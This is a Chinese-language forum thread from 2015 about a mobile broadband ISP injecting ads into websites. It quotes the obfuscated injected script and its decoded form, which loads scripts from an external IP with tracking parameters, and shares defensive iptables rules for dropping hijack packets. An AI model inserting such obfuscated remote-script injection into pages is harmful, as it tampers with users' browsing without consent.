移动宽带访问 51credit，百度等网站居然添加广告

代码如下，居然还是加密的。

<script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00322/249/318/33:;6873903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;687390d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;6873903/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;00322/249/318/33:;687390b0t@beje>311615'uddb>NUN5NUNxPUB3PUV>'vsjq>279327:544'tqpsu>";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="1'fqpsu>1'psmv>bIS1dEpwM3Kjdz52NXOz[XSqeD6kc31w[n:zeX1uN{huNT6peH2t'tqje>2783743675'bsfb>2:7'ut>2535869883'bpsmv>bIS1dEpwM{JyNT5yN{hvNkB4MkJzPUp2O{ZzPD9zNEB2NERw'q2bsn>463'q3bsn>611'q4bsn>21'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>

yetsky

2015-02-24 15:17:59 +08:00

解密后
<html><head><link rel="stylesheet" type="text/css" href="http://211.138.207.229:57628/2.css"><script type="text/javascript" src="http://211.138.207.229:57628/c.js"></script><script type="text/javascript" src="http://211.138.207.229:57628/2.js"></script><script type="text/javascript">var p="http://211.138.207.229:57628/a/s?adid=200504&tcca=MTM4MTMwOTA2OTU=&urip=1682169433&sport=0&eport=0&orlu=aHR0cDovL2Jicy41MWNyZWRpdC5jb20vZm9ydW0tMzgtMS5odG1s&spid=1672632564&area=196&ts=1424758772&aorlu=aHR0cDovLzIxMS4xMzguMjA3LjIyOTo1NzYyOC8yMDA1MDQv&p1arm=352&p2arm=500&p3arm=10&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body></html>

arachide

2015-02-24 15:26:30 +08:00

正常
百度 360 金山搜狗
是中国4大垃圾软件厂商

慎用

偶是不用大把更好性能的工具何必去找虐

wdlth

2015-02-24 15:29:47 +08:00

连电信都加，移动铁通还用说？

tdifg

2015-02-24 15:33:35 +08:00

哎，你是没用过长城宽带

arachide

2015-02-24 15:35:19 +08:00

你去网吧试试bing
保准到百度

哈哈

isnowify

2015-02-24 15:40:56 +08:00

电信访问什么都加，手机端加完广告后整个页面都变得如此细长，惨不忍睹。。。
另外
@Livid should move to http://v2ex.com/go/bb
貌似v2ex支持回复翻页了？

zsx

2015-02-24 16:00:22 +08:00

福州铁通，行为包括：
1. 概率：相当大；劫持百度统计的统计js，行为包括：点击带百度统计的网站的任何位置都会被跳转到某页游网站、右下角弹窗其中之一；
2. 概率：100%；在PCQQ好友面板的 [动态] 和手机QQ空间触屏版投放右下角广告；
3. 概率：100%；把114DNS和Google DNS劫持到自己的DNS；
4. 概率：看心情；百度首页，强制加推广链接并清空Cookies（嗯强制退出百度账号哦）。曾经导致百度搜索无法翻页，点击第二页等强制跳转到第一页。
5. 概率：每日首次访问100%，剩下看心情；淘宝、京东等，跳转到自己的返利链接；
6. 概率：看心情；随机跳转到别的网站（比如打开zhihu.com跳到了电影站）。

另外百度首页的跳转证据还很难抓，我自己用cURL的时候就正常，还要大改HTTP头完全模拟浏览器才能抓得到……而且不定时……我要抓的时候就消失了……

nvidiaAMD980X

2015-02-24 16:57:12 +08:00

百度和Bing的页面也不整洁，Bing搜索框莫名其妙地下拉新闻给你，百度就是个广告流氓～～～最喜欢Google了，但每次搜索都要挂V---P----N。

Silicon

2015-02-24 17:25:38 +08:00

以下几条辽宁铁通保平安
请根据自己情况修改
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -j LOG --log-prefix "Caught bad ttl of hijack: "
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -m comment --comment "Bad ttl of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -m comment --comment "Bad window of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -m comment --comment "Bad window of hijack" -j DROP

kiritoalex

2015-02-24 21:18:42 +08:00

@Silicon 赞一个

s3040608090

2015-02-24 23:22:28 +08:00

我也是用移动宽带，之前手机连wifi上一些网站（比如v2ex）经常上下两条广告，用dnscrypt解决。

Halry

2015-02-25 08:52:27 +08:00

没用过长城？什么http网页都给你加

groot

2015-02-25 08:54:36 +08:00

@arachide 同意，我反正是抵制百毒，360很多年了，都是些没节操的公司

mackyzhan

2015-02-25 09:17:53 +08:00

希望HTTPS赶快普及起来，中国公司哪有节操可言。

moxiaotiao

2015-02-25 12:12:47 +08:00

@zsx 笑死我了

nn574204775

2015-02-25 17:58:32 +08:00

就在用移动没出现上面说的情况 0.0 只是改了默认DNS

shippo7

2015-02-25 23:17:03 +08:00

@Livid 一楼代码Chrome下超出边界

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/172479

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.